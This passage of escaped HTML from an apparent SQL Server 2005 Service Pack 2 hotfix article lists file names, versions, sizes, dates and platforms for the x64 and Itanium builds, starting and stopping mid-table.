class=\"sbody-tr\"><td class=\"sbody-td\">sqlsqm.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">140312</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlwb.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">823832</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlwep.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">90648</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlwep.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">123416</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlwtsn.exe</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">99352</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqsrvres.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">82968</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssradd.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">42520</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssradd.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">50712</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssravg.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">43032</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssravg.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">51736</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssrmax.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">40984</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssrmax.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">48152</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssrmin.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">40984</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssrmin.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">48152</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssrpub.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">30232</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssrpub.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">34840</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">svrenumapi.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">614936</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">svrenumapi.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">836120</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">tablediff.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">87064</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">thawbrkr.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">209768</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:51</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">txagg.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">204312</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">txagg.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">330264</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">txlookup.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">244760</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">txlookup.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">406040</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">txmergejoin.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">140824</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">txmergejoin.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">235544</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xmlfilt.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">271208</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:51</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xmlsub.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">194584</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xmlsub.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">319000</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xpadsi90.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">69656</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xpqueue.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">71192</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xprepl.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">89112</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xpstar90.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">551448</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:04</td><td class=\"sbody-td\">x64</td></tr></table></div><h4 class=\"sbody-h4\">For Itanium-based versions of the SQL Server 2005 Service Pack 2 hotfix</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">autoadmin90.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">901656</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">bcp.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">157208</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">chsbrkr.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">1883496</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">chtbrkr.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">6153576</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">connectiondlg.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">959512</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">databasemailengine.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">78872</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">databasemailprotocols.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">46104</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">distrib.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">200728</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">dts.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">1102360</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">dts.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">3516440</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">dtsconn.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">250392</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">dtsconn.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">725016</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">dtspipeline.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">605208</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">dtspipeline.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">1932824</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">flatfiledest.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">256024</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">flatfiledest.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">908312</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">flatfilesrc.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">264728</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">flatfilesrc.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">934424</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">fteref.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">433152</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">infosoft.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">1915240</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">korwbrkr.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">182632</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">langwrbk.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">333160</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">logread.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">1098776</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">mergetxt.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">32280</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">mergetxt.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">72216</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.analysisservices.controls.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">2765848</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.analysisservices.design.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">5456920</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.analysisservices.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1217560</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.analysisservices.managementdialogs.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1717272</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.analysisservices.wizards.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">6161432</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.datawarehouse.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1279000</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.dataextensions.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">160792</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.dataextensions.sapbw.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">42008</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.dataextensions.xmlaclient.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">562200</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.diagnostics.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">799768</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.excelrendering.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">336920</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.htmlrendering.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">308248</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.imagerendering.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">291864</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.processingcore.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1676312</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.sharepoint.server.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">111640</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.connectioninfo.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">156696</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.dmquerytask.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">332824</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.dtstransferprovider.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">115736</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.maintenanceplantasks.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">295960</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.maintenanceplantasksui.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">721944</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.replication.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">1628184</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.replication.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">2545688</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.scripttask.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">160792</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.scripttaskui.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">62488</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.servicebrokerenum.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">42008</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.smo.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1606680</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.smoenum.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">222232</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.sqlenum.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">898072</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.transfersqlserverobjectstask.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">95256</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.visualstudio.templatewizardinterface.dll</td><td class=\"sbody-td\">8.0.50727.42</td><td class=\"sbody-td\">15872</td><td class=\"sbody-td\">23-Sep-05</td><td class=\"sbody-td\">6:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msadomdx.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">502296</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msdtssrvr.exe</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">201752</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msfte.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">7072104</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msftefd.exe</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">173416</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msftepxy.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">135528</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msftesql.exe</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">294760</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msgprox.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">200216</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msgprox.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">544792</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msir5jp.dll</td><td class=\"sbody-td\">5.0.2130.0</td><td class=\"sbody-td\">3824488</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msmdlocal.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">15973912</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msmdlocal.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">50010648</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msmdredir.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">6298648</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msmdspdm.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">201752</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msmdsrv.exe</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">48960024</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msmgdsrv.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">6046232</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msmgdsrv.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">13173272</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td 